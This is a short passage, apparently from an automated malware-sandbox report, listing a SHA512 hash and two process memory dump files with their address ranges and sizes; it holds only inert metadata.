  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- memory/2920-305-0x0000000000420000-0x0000000000428000-memory.dmp
  Filesize: 32KB
- memory/3472-201-0x000001B59AE80000-0x000001B59AEA2000-memory.dmp
  Filesize: 136KB